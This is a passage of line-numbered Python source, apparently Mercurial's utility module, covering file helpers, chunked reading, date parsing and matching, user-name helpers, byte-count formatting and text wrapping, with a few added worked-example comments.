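#   >>> with atomictempfile(b'somefile', checkambig=True) as fp:
#   ...     fp.write(b'new content')
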
1783 1788 def unlinkpath(f, ignoremissing=False):
1784 1789 """unlink and remove the directory if it is empty"""
1785 1790 if ignoremissing:
1786 1791 tryunlink(f)
1787 1792 else:
1788 1793 unlink(f)
1789 1794 # try removing directories that might now be empty
1790 1795 try:
1791 1796 removedirs(os.path.dirname(f))
1792 1797 except OSError:
1793 1798 pass
1794 1799
1795 1800 def tryunlink(f):
1796 1801 """Attempt to remove a file, ignoring ENOENT errors."""
1797 1802 try:
1798 1803 unlink(f)
1799 1804 except OSError as e:
1800 1805 if e.errno != errno.ENOENT:
1801 1806 raise
1802 1807
1803 1808 def makedirs(name, mode=None, notindexed=False):
1804 1809 """recursive directory creation with parent mode inheritance
1805 1810
1806 1811 Newly created directories are marked as "not to be indexed by
1807 1812 the content indexing service", if ``notindexed`` is specified
1808 1813 for "write" mode access.
1809 1814 """
1810 1815 try:
1811 1816 makedir(name, notindexed)
1812 1817 except OSError as err:
1813 1818 if err.errno == errno.EEXIST:
1814 1819 return
1815 1820 if err.errno != errno.ENOENT or not name:
1816 1821 raise
1817 1822 parent = os.path.dirname(os.path.abspath(name))
1818 1823 if parent == name:
1819 1824 raise
1820 1825 makedirs(parent, mode, notindexed)
1821 1826 try:
1822 1827 makedir(name, notindexed)
1823 1828 except OSError as err:
1824 1829 # Catch EEXIST to handle races
1825 1830 if err.errno == errno.EEXIST:
1826 1831 return
1827 1832 raise
1828 1833 if mode is not None:
1829 1834 os.chmod(name, mode)
1830 1835
1831 1836 def readfile(path):
1832 1837 with open(path, 'rb') as fp:
1833 1838 return fp.read()
1834 1839
1835 1840 def writefile(path, text):
1836 1841 with open(path, 'wb') as fp:
1837 1842 fp.write(text)
1838 1843
1839 1844 def appendfile(path, text):
1840 1845 with open(path, 'ab') as fp:
1841 1846 fp.write(text)
1842 1847
1843 1848 class chunkbuffer(object):
1844 1849 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 1850 iterator over chunks of arbitrary size."""
1846 1851
1847 1852 def __init__(self, in_iter):
1848 1853 """in_iter is the iterator that's iterating over the input chunks."""
1849 1854 def splitbig(chunks):
1850 1855 for chunk in chunks:
1851 1856 if len(chunk) > 2**20:
1852 1857 pos = 0
1853 1858 while pos < len(chunk):
1854 1859 end = pos + 2 ** 18
1855 1860 yield chunk[pos:end]
1856 1861 pos = end
1857 1862 else:
1858 1863 yield chunk
1859 1864 self.iter = splitbig(in_iter)
1860 1865 self._queue = collections.deque()
1861 1866 self._chunkoffset = 0
1862 1867
1863 1868 def read(self, l=None):
1864 1869 """Read L bytes of data from the iterator of chunks of data.
1865 1870 Returns less than L bytes if the iterator runs dry.
1866 1871
1867 1872 If size parameter is omitted, read everything"""
1868 1873 if l is None:
1869 1874 return ''.join(self.iter)
1870 1875
1871 1876 left = l
1872 1877 buf = []
1873 1878 queue = self._queue
1874 1879 while left > 0:
1875 1880 # refill the queue
1876 1881 if not queue:
1877 1882 target = 2**18
1878 1883 for chunk in self.iter:
1879 1884 queue.append(chunk)
1880 1885 target -= len(chunk)
1881 1886 if target <= 0:
1882 1887 break
1883 1888 if not queue:
1884 1889 break
1885 1890
1886 1891 # The easy way to do this would be to queue.popleft(), modify the
1887 1892 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 1893 # where we read partial chunk content, this incurs 2 dequeue
1889 1894 # mutations and creates a new str for the remaining chunk in the
1890 1895 # queue. Our code below avoids this overhead.
1891 1896
1892 1897 chunk = queue[0]
1893 1898 chunkl = len(chunk)
1894 1899 offset = self._chunkoffset
1895 1900
1896 1901 # Use full chunk.
1897 1902 if offset == 0 and left >= chunkl:
1898 1903 left -= chunkl
1899 1904 queue.popleft()
1900 1905 buf.append(chunk)
1901 1906 # self._chunkoffset remains at 0.
1902 1907 continue
1903 1908
1904 1909 chunkremaining = chunkl - offset
1905 1910
1906 1911 # Use all of unconsumed part of chunk.
1907 1912 if left >= chunkremaining:
1908 1913 left -= chunkremaining
1909 1914 queue.popleft()
1910 1915 # The offset == 0 case is handled by the block above, so offset > 0
1911 1916 # here and this won't merely copy via ``chunk[0:]``.
1912 1917 buf.append(chunk[offset:])
1913 1918 self._chunkoffset = 0
1914 1919
1915 1920 # Partial chunk needed.
1916 1921 else:
1917 1922 buf.append(chunk[offset:offset + left])
1918 1923 self._chunkoffset += left
1919 1924 left -= chunkremaining
1920 1925
1921 1926 return ''.join(buf)
1922 1927
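# A worked example (editor's addition) of how sized reads straddle the
# underlying chunks; a partial read leaves the rest of a chunk queued,
# tracked via _chunkoffset:
#
#   >>> buf = chunkbuffer(iter([b'abc', b'defg']))
#   >>> buf.read(2)   # partial consumption of the first chunk
#   'ab'
#   >>> buf.read(5)   # rest of 'abc', then all of 'defg'
#   'cdefg'
#   >>> buf.read(5)   # iterator exhausted
#   ''
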
1923 1928 def filechunkiter(f, size=131072, limit=None):
1924 1929 """Create a generator that produces the data in the file size
1925 1930 (default 131072) bytes at a time, up to optional limit (default is
1926 1931 to read all data). Chunks may be less than size bytes if the
1927 1932 chunk is the last chunk in the file, or the file is a socket or
1928 1933 some other type of file that sometimes reads less data than is
1929 1934 requested."""
1930 1935 assert size >= 0
1931 1936 assert limit is None or limit >= 0
1932 1937 while True:
1933 1938 if limit is None:
1934 1939 nbytes = size
1935 1940 else:
1936 1941 nbytes = min(limit, size)
1937 1942 s = nbytes and f.read(nbytes)
1938 1943 if not s:
1939 1944 break
1940 1945 if limit:
1941 1946 limit -= len(s)
1942 1947 yield s
1943 1948
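# A usage sketch (editor's addition): stream a file in bounded chunks
# instead of reading it whole; 'consume' is a hypothetical callback.
#
#   >>> fp = open('somefile', 'rb')
#   >>> for chunk in filechunkiter(fp, size=65536):
#   ...     consume(chunk)
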
1944 1949 def makedate(timestamp=None):
1945 1950 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 1951 offset) tuple based on the local timezone.'''
1947 1952 if timestamp is None:
1948 1953 timestamp = time.time()
1949 1954 if timestamp < 0:
1950 1955 hint = _("check your clock")
1951 1956 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 1957 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 1958 datetime.datetime.fromtimestamp(timestamp))
1954 1959 tz = delta.days * 86400 + delta.seconds
1955 1960 return timestamp, tz
1956 1961
1957 1962 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 1963 """represent a (unixtime, offset) tuple as a localized time.
1959 1964 unixtime is seconds since the epoch, and offset is the time zone's
1960 1965 number of seconds away from UTC.
1961 1966
1962 1967 >>> datestr((0, 0))
1963 1968 'Thu Jan 01 00:00:00 1970 +0000'
1964 1969 >>> datestr((42, 0))
1965 1970 'Thu Jan 01 00:00:42 1970 +0000'
1966 1971 >>> datestr((-42, 0))
1967 1972 'Wed Dec 31 23:59:18 1969 +0000'
1968 1973 >>> datestr((0x7fffffff, 0))
1969 1974 'Tue Jan 19 03:14:07 2038 +0000'
1970 1975 >>> datestr((-0x80000000, 0))
1971 1976 'Fri Dec 13 20:45:52 1901 +0000'
1972 1977 """
1973 1978 t, tz = date or makedate()
1974 1979 if "%1" in format or "%2" in format or "%z" in format:
1975 1980 sign = (tz > 0) and "-" or "+"
1976 1981 minutes = abs(tz) // 60
1977 1982 q, r = divmod(minutes, 60)
1978 1983 format = format.replace("%z", "%1%2")
1979 1984 format = format.replace("%1", "%c%02d" % (sign, q))
1980 1985 format = format.replace("%2", "%02d" % r)
1981 1986 d = t - tz
1982 1987 if d > 0x7fffffff:
1983 1988 d = 0x7fffffff
1984 1989 elif d < -0x80000000:
1985 1990 d = -0x80000000
1986 1991 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 1992 # because they use the gmtime() system call which is buggy on Windows
1988 1993 # for negative values.
1989 1994 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 1995 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 1996 return s
1992 1997
1993 1998 def shortdate(date=None):
1994 1999 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 2000 return datestr(date, format='%Y-%m-%d')
1996 2001
1997 2002 def parsetimezone(s):
1998 2003 """find a trailing timezone, if any, in string, and return a
1999 2004 (offset, remainder) pair"""
2000 2005
2001 2006 if s.endswith("GMT") or s.endswith("UTC"):
2002 2007 return 0, s[:-3].rstrip()
2003 2008
2004 2009 # Unix-style timezones [+-]hhmm
2005 2010 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 2011 sign = (s[-5] == "+") and 1 or -1
2007 2012 hours = int(s[-4:-2])
2008 2013 minutes = int(s[-2:])
2009 2014 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010 2015
2011 2016 # ISO8601 trailing Z
2012 2017 if s.endswith("Z") and s[-2:-1].isdigit():
2013 2018 return 0, s[:-1]
2014 2019
2015 2020 # ISO8601-style [+-]hh:mm
2016 2021 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 2022 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 2023 sign = (s[-6] == "+") and 1 or -1
2019 2024 hours = int(s[-5:-3])
2020 2025 minutes = int(s[-2:])
2021 2026 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022 2027
2023 2028 return None, s
2024 2029
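# Worked examples (editor's addition) for the formats handled above. Note
# the sign convention: zones east of UTC yield negative offsets, matching
# makedate().
#
#   >>> parsetimezone(b'Sat Apr 15 13:30:00 2006 +0200')
#   (-7200, 'Sat Apr 15 13:30:00 2006')
#   >>> parsetimezone(b'2006-04-15T13:30Z')
#   (0, '2006-04-15T13:30')
#   >>> parsetimezone(b'no timezone at all')
#   (None, 'no timezone at all')
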
2025 2030 def strdate(string, format, defaults=None):
2026 2031 """parse a localized time string and return a (unixtime, offset) tuple.
2027 2032 if the string cannot be parsed, ValueError is raised."""
2028 2033 if defaults is None:
2029 2034 defaults = {}
2030 2035
2031 2036 # NOTE: unixtime = localunixtime + offset
2032 2037 offset, date = parsetimezone(string)
2033 2038
2034 2039 # add missing elements from defaults
2035 2040 usenow = False # default to using biased defaults
2036 2041 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 2042 part = pycompat.bytestr(part)
2038 2043 found = [True for p in part if ("%"+p) in format]
2039 2044 if not found:
2040 2045 date += "@" + defaults[part][usenow]
2041 2046 format += "@%" + part[0]
2042 2047 else:
2043 2048 # We've found a specific time element; less specific time
2044 2049 # elements are relative to today
2045 2050 usenow = True
2046 2051
2047 2052 timetuple = time.strptime(encoding.strfromlocal(date),
2048 2053 encoding.strfromlocal(format))
2049 2054 localunixtime = int(calendar.timegm(timetuple))
2050 2055 if offset is None:
2051 2056 # local timezone
2052 2057 unixtime = int(time.mktime(timetuple))
2053 2058 offset = unixtime - localunixtime
2054 2059 else:
2055 2060 unixtime = localunixtime + offset
2056 2061 return unixtime, offset
2057 2062
2058 2063 def parsedate(date, formats=None, bias=None):
2059 2064 """parse a localized date/time and return a (unixtime, offset) tuple.
2060 2065
2061 2066 The date may be a "unixtime offset" string or in one of the specified
2062 2067 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063 2068
2064 2069 >>> parsedate(b' today ') == parsedate(
2065 2070 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 2071 True
2067 2072 >>> parsedate(b'yesterday ') == parsedate(
2068 2073 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 2074 ... ).strftime('%b %d').encode('ascii'))
2070 2075 True
2071 2076 >>> now, tz = makedate()
2072 2077 >>> strnow, strtz = parsedate(b'now')
2073 2078 >>> (strnow - now) < 1
2074 2079 True
2075 2080 >>> tz == strtz
2076 2081 True
2077 2082 """
2078 2083 if bias is None:
2079 2084 bias = {}
2080 2085 if not date:
2081 2086 return 0, 0
2082 2087 if isinstance(date, tuple) and len(date) == 2:
2083 2088 return date
2084 2089 if not formats:
2085 2090 formats = defaultdateformats
2086 2091 date = date.strip()
2087 2092
2088 2093 if date == 'now' or date == _('now'):
2089 2094 return makedate()
2090 2095 if date == 'today' or date == _('today'):
2091 2096 date = datetime.date.today().strftime(r'%b %d')
2092 2097 date = encoding.strtolocal(date)
2093 2098 elif date == 'yesterday' or date == _('yesterday'):
2094 2099 date = (datetime.date.today() -
2095 2100 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 2101 date = encoding.strtolocal(date)
2097 2102
2098 2103 try:
2099 2104 when, offset = map(int, date.split(' '))
2100 2105 except ValueError:
2101 2106 # fill out defaults
2102 2107 now = makedate()
2103 2108 defaults = {}
2104 2109 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 2110 # this piece is for rounding the specific end of unknowns
2106 2111 b = bias.get(part)
2107 2112 if b is None:
2108 2113 if part[0:1] in "HMS":
2109 2114 b = "00"
2110 2115 else:
2111 2116 b = "0"
2112 2117
2113 2118 # this piece is for matching the generic end to today's date
2114 2119 n = datestr(now, "%" + part[0:1])
2115 2120
2116 2121 defaults[part] = (b, n)
2117 2122
2118 2123 for format in formats:
2119 2124 try:
2120 2125 when, offset = strdate(date, format, defaults)
2121 2126 except (ValueError, OverflowError):
2122 2127 pass
2123 2128 else:
2124 2129 break
2125 2130 else:
2126 2131 raise error.ParseError(_('invalid date: %r') % date)
2127 2132 # validate explicit (probably user-specified) date and
2128 2133 # time zone offset. values must fit in signed 32 bits for
2129 2134 # current 32-bit linux runtimes. timezones go from UTC-12
2130 2135 # to UTC+14
2131 2136 if when < -0x80000000 or when > 0x7fffffff:
2132 2137 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 2138 if offset < -50400 or offset > 43200:
2134 2139 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 2140 return when, offset
2136 2141
2137 2142 def matchdate(date):
2138 2143 """Return a function that matches a given date match specifier
2139 2144
2140 2145 Formats include:
2141 2146
2142 2147 '{date}' match a given date to the accuracy provided
2143 2148
2144 2149 '<{date}' on or before a given date
2145 2150
2146 2151 '>{date}' on or after a given date
2147 2152
2148 2153 >>> p1 = parsedate(b"10:29:59")
2149 2154 >>> p2 = parsedate(b"10:30:00")
2150 2155 >>> p3 = parsedate(b"10:30:59")
2151 2156 >>> p4 = parsedate(b"10:31:00")
2152 2157 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 2158 >>> f = matchdate(b"10:30")
2154 2159 >>> f(p1[0])
2155 2160 False
2156 2161 >>> f(p2[0])
2157 2162 True
2158 2163 >>> f(p3[0])
2159 2164 True
2160 2165 >>> f(p4[0])
2161 2166 False
2162 2167 >>> f(p5[0])
2163 2168 False
2164 2169 """
2165 2170
2166 2171 def lower(date):
2167 2172 d = {'mb': "1", 'd': "1"}
2168 2173 return parsedate(date, extendeddateformats, d)[0]
2169 2174
2170 2175 def upper(date):
2171 2176 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 2177 for days in ("31", "30", "29"):
2173 2178 try:
2174 2179 d["d"] = days
2175 2180 return parsedate(date, extendeddateformats, d)[0]
2176 2181 except Abort:
2177 2182 pass
2178 2183 d["d"] = "28"
2179 2184 return parsedate(date, extendeddateformats, d)[0]
2180 2185
2181 2186 date = date.strip()
2182 2187
2183 2188 if not date:
2184 2189 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 2190 elif date[0] == "<":
2186 2191 if not date[1:]:
2187 2192 raise Abort(_("invalid day spec, use '<DATE'"))
2188 2193 when = upper(date[1:])
2189 2194 return lambda x: x <= when
2190 2195 elif date[0] == ">":
2191 2196 if not date[1:]:
2192 2197 raise Abort(_("invalid day spec, use '>DATE'"))
2193 2198 when = lower(date[1:])
2194 2199 return lambda x: x >= when
2195 2200 elif date[0] == "-":
2196 2201 try:
2197 2202 days = int(date[1:])
2198 2203 except ValueError:
2199 2204 raise Abort(_("invalid day spec: %s") % date[1:])
2200 2205 if days < 0:
2201 2206 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 2207 % date[1:])
2203 2208 when = makedate()[0] - days * 3600 * 24
2204 2209 return lambda x: x >= when
2205 2210 elif " to " in date:
2206 2211 a, b = date.split(" to ")
2207 2212 start, stop = lower(a), upper(b)
2208 2213 return lambda x: x >= start and x <= stop
2209 2214 else:
2210 2215 start, stop = lower(date), upper(date)
2211 2216 return lambda x: x >= start and x <= stop
2212 2217
2213 2218 def stringmatcher(pattern, casesensitive=True):
2214 2219 """
2215 2220 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 2221 returns the matcher name, pattern, and matcher function.
2217 2222 missing or unknown prefixes are treated as literal matches.
2218 2223
2219 2224 helper for tests:
2220 2225 >>> def test(pattern, *tests):
2221 2226 ... kind, pattern, matcher = stringmatcher(pattern)
2222 2227 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2228 >>> def itest(pattern, *tests):
2224 2229 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 2230 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226 2231
2227 2232 exact matching (no prefix):
2228 2233 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 2234 ('literal', 'abcdefg', [False, False, True])
2230 2235
2231 2236 regex matching ('re:' prefix)
2232 2237 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 2238 ('re', 'a.+b', [False, False, True])
2234 2239
2235 2240 force exact matches ('literal:' prefix)
2236 2241 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 2242 ('literal', 're:foobar', [False, True])
2238 2243
2239 2244 unknown prefixes are ignored and treated as literals
2240 2245 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 2246 ('literal', 'foo:bar', [False, False, True])
2242 2247
2243 2248 case insensitive regex matches
2244 2249 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 2250 ('re', 'A.+b', [False, False, True])
2246 2251
2247 2252 case insensitive literal matches
2248 2253 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 2254 ('literal', 'ABCDEFG', [False, False, True])
2250 2255 """
2251 2256 if pattern.startswith('re:'):
2252 2257 pattern = pattern[3:]
2253 2258 try:
2254 2259 flags = 0
2255 2260 if not casesensitive:
2256 2261 flags = remod.I
2257 2262 regex = remod.compile(pattern, flags)
2258 2263 except remod.error as e:
2259 2264 raise error.ParseError(_('invalid regular expression: %s')
2260 2265 % e)
2261 2266 return 're', pattern, regex.search
2262 2267 elif pattern.startswith('literal:'):
2263 2268 pattern = pattern[8:]
2264 2269
2265 2270 match = pattern.__eq__
2266 2271
2267 2272 if not casesensitive:
2268 2273 ipat = encoding.lower(pattern)
2269 2274 match = lambda s: ipat == encoding.lower(s)
2270 2275 return 'literal', pattern, match
2271 2276
2272 2277 def shortuser(user):
2273 2278 """Return a short representation of a user name or email address."""
2274 2279 f = user.find('@')
2275 2280 if f >= 0:
2276 2281 user = user[:f]
2277 2282 f = user.find('<')
2278 2283 if f >= 0:
2279 2284 user = user[f + 1:]
2280 2285 f = user.find(' ')
2281 2286 if f >= 0:
2282 2287 user = user[:f]
2283 2288 f = user.find('.')
2284 2289 if f >= 0:
2285 2290 user = user[:f]
2286 2291 return user
2287 2292
2288 2293 def emailuser(user):
2289 2294 """Return the user portion of an email address."""
2290 2295 f = user.find('@')
2291 2296 if f >= 0:
2292 2297 user = user[:f]
2293 2298 f = user.find('<')
2294 2299 if f >= 0:
2295 2300 user = user[f + 1:]
2296 2301 return user
2297 2302
2298 2303 def email(author):
2299 2304 '''get email of author.'''
2300 2305 r = author.find('>')
2301 2306 if r == -1:
2302 2307 r = None
2303 2308 return author[author.find('<') + 1:r]
2304 2309
2305 2310 def ellipsis(text, maxlength=400):
2306 2311 """Trim string to at most maxlength (default: 400) columns in display."""
2307 2312 return encoding.trim(text, maxlength, ellipsis='...')
2308 2313
2309 2314 def unitcountfn(*unittable):
2310 2315 '''return a function that renders a readable count of some quantity'''
2311 2316
2312 2317 def go(count):
2313 2318 for multiplier, divisor, format in unittable:
2314 2319 if abs(count) >= divisor * multiplier:
2315 2320 return format % (count / float(divisor))
2316 2321 return unittable[-1][2] % count
2317 2322
2318 2323 return go
2319 2324
2320 2325 def processlinerange(fromline, toline):
2321 2326 """Check that linerange <fromline>:<toline> makes sense and return a
2322 2327 0-based range.
2323 2328
2324 2329 >>> processlinerange(10, 20)
2325 2330 (9, 20)
2326 2331 >>> processlinerange(2, 1)
2327 2332 Traceback (most recent call last):
2328 2333 ...
2329 2334 ParseError: line range must be positive
2330 2335 >>> processlinerange(0, 5)
2331 2336 Traceback (most recent call last):
2332 2337 ...
2333 2338 ParseError: fromline must be strictly positive
2334 2339 """
2335 2340 if toline - fromline < 0:
2336 2341 raise error.ParseError(_("line range must be positive"))
2337 2342 if fromline < 1:
2338 2343 raise error.ParseError(_("fromline must be strictly positive"))
2339 2344 return fromline - 1, toline
2340 2345
2341 2346 bytecount = unitcountfn(
2342 2347 (100, 1 << 30, _('%.0f GB')),
2343 2348 (10, 1 << 30, _('%.1f GB')),
2344 2349 (1, 1 << 30, _('%.2f GB')),
2345 2350 (100, 1 << 20, _('%.0f MB')),
2346 2351 (10, 1 << 20, _('%.1f MB')),
2347 2352 (1, 1 << 20, _('%.2f MB')),
2348 2353 (100, 1 << 10, _('%.0f KB')),
2349 2354 (10, 1 << 10, _('%.1f KB')),
2350 2355 (1, 1 << 10, _('%.2f KB')),
2351 2356 (1, 1, _('%.0f bytes')),
2352 2357 )
2353 2358
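# Worked examples (editor's addition): the table above picks the first
# row whose threshold (multiplier * divisor) the value reaches, falling
# back to plain bytes.
#
#   >>> bytecount(2252)      # 2252 / 2**10 ~= 2.199
#   '2.20 KB'
#   >>> bytecount(6 * 2**20)
#   '6.00 MB'
#   >>> bytecount(512)
#   '512 bytes'
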
2354 2359 # Matches a single EOL which can either be a CRLF where repeated CR
2355 2360 # are removed or a LF. We do not care about old Macintosh files, so a
2356 2361 # stray CR is an error.
2357 2362 _eolre = remod.compile(br'\r*\n')
2358 2363
2359 2364 def tolf(s):
2360 2365 return _eolre.sub('\n', s)
2361 2366
2362 2367 def tocrlf(s):
2363 2368 return _eolre.sub('\r\n', s)
2364 2369
2365 2370 if pycompat.oslinesep == '\r\n':
2366 2371 tonativeeol = tocrlf
2367 2372 fromnativeeol = tolf
2368 2373 else:
2369 2374 tonativeeol = pycompat.identity
2370 2375 fromnativeeol = pycompat.identity
2371 2376
2372 2377 def escapestr(s):
2373 2378 # call underlying function of s.encode('string_escape') directly for
2374 2379 # Python 3 compatibility
2375 2380 return codecs.escape_encode(s)[0]
2376 2381
2377 2382 def unescapestr(s):
2378 2383 return codecs.escape_decode(s)[0]
2379 2384
2380 2385 def forcebytestr(obj):
2381 2386 """Portably format an arbitrary object (e.g. exception) into a byte
2382 2387 string."""
2383 2388 try:
2384 2389 return pycompat.bytestr(obj)
2385 2390 except UnicodeEncodeError:
2386 2391 # non-ascii string, may be lossy
2387 2392 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388 2393
2389 2394 def uirepr(s):
2390 2395 # Avoid double backslash in Windows path repr()
2391 2396 return repr(s).replace('\\\\', '\\')
2392 2397
2393 2398 # delay import of textwrap
2394 2399 def MBTextWrapper(**kwargs):
2395 2400 class tw(textwrap.TextWrapper):
2396 2401 """
2397 2402 Extend TextWrapper for width-awareness.
2398 2403
2399 2404 Neither the number of 'bytes' in any encoding nor the number of
2400 2405 'characters' is appropriate for calculating terminal columns of a string.
2401 2406
2402 2407 The original TextWrapper implementation uses the built-in 'len()'
2403 2408 directly, so overriding is needed to use the width of each character.
2404 2409
2405 2410 In addition, characters classified as having 'ambiguous' width are
2406 2411 treated as wide in East Asian locales, but as narrow elsewhere.
2407 2412
2408 2413 This requires a user decision to determine the width of such characters.
2409 2414 """
2410 2415 def _cutdown(self, ucstr, space_left):
2411 2416 l = 0
2412 2417 colwidth = encoding.ucolwidth
2413 2418 for i in xrange(len(ucstr)):
2414 2419 l += colwidth(ucstr[i])
2415 2420 if space_left < l:
2416 2421 return (ucstr[:i], ucstr[i:])
2417 2422 return ucstr, ''
2418 2423
2419 2424 # overriding of base class
2420 2425 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 2426 space_left = max(width - cur_len, 1)
2422 2427
2423 2428 if self.break_long_words:
2424 2429 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 2430 cur_line.append(cut)
2426 2431 reversed_chunks[-1] = res
2427 2432 elif not cur_line:
2428 2433 cur_line.append(reversed_chunks.pop())
2429 2434
2430 2435 # this overriding code is imported from TextWrapper of Python 2.6
2431 2436 # to calculate columns of string by 'encoding.ucolwidth()'
2432 2437 def _wrap_chunks(self, chunks):
2433 2438 colwidth = encoding.ucolwidth
2434 2439
2435 2440 lines = []
2436 2441 if self.width <= 0:
2437 2442 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438 2443
2439 2444 # Arrange in reverse order so items can be efficiently popped
2440 2445 # from a stack of chunks.
2441 2446 chunks.reverse()
2442 2447
2443 2448 while chunks:
2444 2449
2445 2450 # Start the list of chunks that will make up the current line.
2446 2451 # cur_len is just the length of all the chunks in cur_line.
2447 2452 cur_line = []
2448 2453 cur_len = 0
2449 2454
2450 2455 # Figure out which static string will prefix this line.
2451 2456 if lines:
2452 2457 indent = self.subsequent_indent
2453 2458 else:
2454 2459 indent = self.initial_indent
2455 2460
2456 2461 # Maximum width for this line.
2457 2462 width = self.width - len(indent)
2458 2463
2459 2464 # First chunk on line is whitespace -- drop it, unless this
2460 2465 # is the very beginning of the text (i.e. no lines started yet).
2461 2466 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 2467 del chunks[-1]
2463 2468
2464 2469 while chunks:
2465 2470 l = colwidth(chunks[-1])
2466 2471
2467 2472 # Can at least squeeze this chunk onto the current line.
2468 2473 if cur_len + l <= width:
2469 2474 cur_line.append(chunks.pop())
2470 2475 cur_len += l
2471 2476
2472 2477 # Nope, this line is full.
2473 2478 else:
2474 2479 break
2475 2480
2476 2481 # The current line is full, and the next chunk is too big to
2477 2482 # fit on *any* line (not just this one).
2478 2483 if chunks and colwidth(chunks[-1]) > width:
2479 2484 self._handle_long_word(chunks, cur_line, cur_len, width)
2480 2485
2481 2486 # If the last chunk on this line is all whitespace, drop it.
2482 2487 if (self.drop_whitespace and
2483 2488 cur_line and cur_line[-1].strip() == r''):
2484 2489 del cur_line[-1]
2485 2490
2486 2491 # Convert current line back to a string and store it in list
2487 2492 # of all lines (return value).
2488 2493 if cur_line:
2489 2494 lines.append(indent + r''.join(cur_line))
2490 2495
2491 2496 return lines
2492 2497
2493 2498 global MBTextWrapper
2494 2499 MBTextWrapper = tw
2495 2500 return tw(**kwargs)
2496 2501
2497 2502 def wrap(line, width, initindent='', hangindent=''):
2498 2503 maxindent = max(len(hangindent), len(initindent))
2499 2504 if width <= maxindent:
2500 2505 # adjust for weird terminal size
2501 2506 width = max(78, maxindent + 1)
2502 2507 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 2508 pycompat.sysstr(encoding.encodingmode))
2504 2509 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 2510 pycompat.sysstr(encoding.encodingmode))
2506 2511 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 2512 pycompat.sysstr(encoding.encodingmode))
2508 2513 wrapper = MBTextWrapper(width=width,
2509 2514 initial_indent=initindent,
2510 2515 subsequent_indent=hangindent)
2511 2516 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512 2517
2513 2518 if (pyplatform.python_implementation() == 'CPython' and
2514 2519 sys.version_info < (3, 0)):
2515 2520 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2521 # correctly. The following table shows what CPython version (and functions)
2517 2522 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2523 #
2519 2524 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2525 # --------------------------------------------------
2521 2526 # fp.__iter__ | buggy | buggy | okay
2522 2527 # fp.read* | buggy | okay [1] | okay
2523 2528 #
2524 2529 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2530 #
2526 2531 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2532 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2533 #
2529 2534 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2535 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2536 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2537 # fp.__iter__ but not other fp.read* methods.
2533 2538 #
2534 2539 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2540 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2541 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2542 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2543 # to minimize the performance impact.
2539 2544 if sys.version_info >= (2, 7, 4):
2540 2545 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2546 def _safeiterfile(fp):
2542 2547 return iter(fp.readline, '')
2543 2548 else:
2544 2549 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2550 # note: this may block longer than necessary because of bufsize.
2546 2551 def _safeiterfile(fp, bufsize=4096):
2547 2552 fd = fp.fileno()
2548 2553 line = ''
2549 2554 while True:
2550 2555 try:
2551 2556 buf = os.read(fd, bufsize)
2552 2557 except OSError as ex:
2553 2558 # os.read only raises EINTR before any data is read
2554 2559 if ex.errno == errno.EINTR:
2555 2560 continue
2556 2561 else:
2557 2562 raise
2558 2563 line += buf
2559 2564 if '\n' in buf:
2560 2565 splitted = line.splitlines(True)
2561 2566 line = ''
